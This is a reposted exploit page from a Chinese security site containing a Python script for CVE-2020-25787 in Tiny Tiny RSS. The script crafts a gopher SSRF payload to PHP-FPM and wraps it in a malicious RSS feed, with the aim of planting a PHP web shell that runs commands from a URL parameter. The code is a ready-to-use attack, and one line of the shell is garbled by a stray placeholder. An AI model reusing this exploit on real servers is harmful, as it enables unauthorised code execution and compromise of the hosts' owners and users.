首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Tiny Tiny RSS - Remote Code Execution
来源:https://www.digeex.de/blog 作者:Neagaru 发布时间:2021-03-03  
# Exploit Title: Tiny Tiny RSS - Remote Code Execution
# Date: 21/09/2020
# Exploit Author: Daniel Neagaru & Benjamin Nadarević
# Blog post: https://www.digeex.de/blog/tinytinyrss/
# Software Link: https://git.tt-rss.org/fox/tt-rss
# Version: all before 2020-09-16
# Commit with the fixes: https://git.tt-rss.org/fox/tt-rss/commit/c3d14e1fa54c7dade7b1b7955575e2991396d7ef
# Tested on: default docker installation method
# CVE : CVE-2020-25787

#!/usr/bin/env python3

from sys import argv
import urllib.parse as ul
import base64


def CustomFcgi( filename, output, backdoor):
    length=len(output)+len(backdoor)+64
    char=chr(length)

    data = "\x0f\x10SERVER_SOFTWAREgo / fcgiclient \x0b\tREMOTE_ADDR127.0.0.1\x0f\x08SERVER_PROTOCOLHTTP/1.1\x0e" + chr(len(str(length)))
    data += "CONTENT_LENGTH" + str(length) +  "\x0e\x04REQUEST_METHODPOST\tKPHP_VALUEallow_url_include = On\n"
    data += "disable_functions = \nauto_prepend_file = php://input\x0f" + chr(len(filename)) +"SCRIPT_FILENAME" + filename + "\r\x01DOCUMENT_ROOT/"

    temp1 = chr(len(data) // 256)
    temp2 = chr(len(data) % 256)
    temp3 = chr(len(data) % 8)

    end = str("\x00"*(len(data)%8)) + "\x01\x04\x00\x01\x00\x00\x00\x00\x01\x05\x00\x01\x00" + char + "\x04\x00"
    end += "<?php file_put_contents('" + output + "',base64_decode("+ "'"+str(backdoor.decode('ascii'))+"')"+");die('executed');?>\x00\x00\x00\x00"
    start = "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x04\x00\x01" + temp1 + temp2 + temp3 + "\x00"

    payload = start + data + end
    def get_payload(payload):
        finalpayload = ul.quote_plus(payload, encoding="latin-1").replace("+","%20").replace("%2F","/")
        return finalpayload

    return "gopher://localhost:9000/_"+get_payload(get_payload(payload))



TTRSS_PATH = "/var/www/html/tt-rss/"
BACKDOOR_CODE = """
<?php
echo "success\n";
echo system(
___FCKpd___0
GET['cmd']); ?> """ feed_file = open("malicious_RCE_feed.xml",'w') filename = TTRSS_PATH + "config.php" output = TTRSS_PATH + "backdoor.php" backdoor_code = base64.b64encode(BACKDOOR_CODE.encode("ascii")) rce = "public.php?op=pluginhandler&plugin=af_proxy_http&pmethod=imgproxy&url=" + CustomFcgi(filename, output, backdoor_code) + "&text" feed ="""<?xml version="1.0" encoding="UTF-8" ?> <rss version="2.0"> <channel> <title>Exploit demo - rce</title> <link></link> <description>You are getting infected :(</description> <item> <title> Check if there is backdoor.php</title> <link><![CDATA[backdoor.php?cmd=id&bypass_filter=://]]></link> <description> <![CDATA[ Dummy text <img src="{}"> ]]> </description> </item> </channel> </rss> """.format(rce) feed_file.write(feed) feed_file.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Covid-19 Contact Tracing Syste
·Zen Cart 1.5.7b - Remote Code
·Online Catering Reservation Sy
·AnyDesk 5.5.2 - Remote Code Ex
·VMware vCenter Server 7.0 - Un
·Hotel and Lodge Management Sys
·WiFi Mouse 1.7.8.5 - Remote Co
·Joomla JCK Editor 6.4.4 - 'par
·FortiLogger 4.4.2.2 - Unauthen
·Golden FTP Server 4.70 - 'PASS
·VMware vCenter 6.5 / 7.0 Remot
·Atlassian JIRA 8.11.1 - User E
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved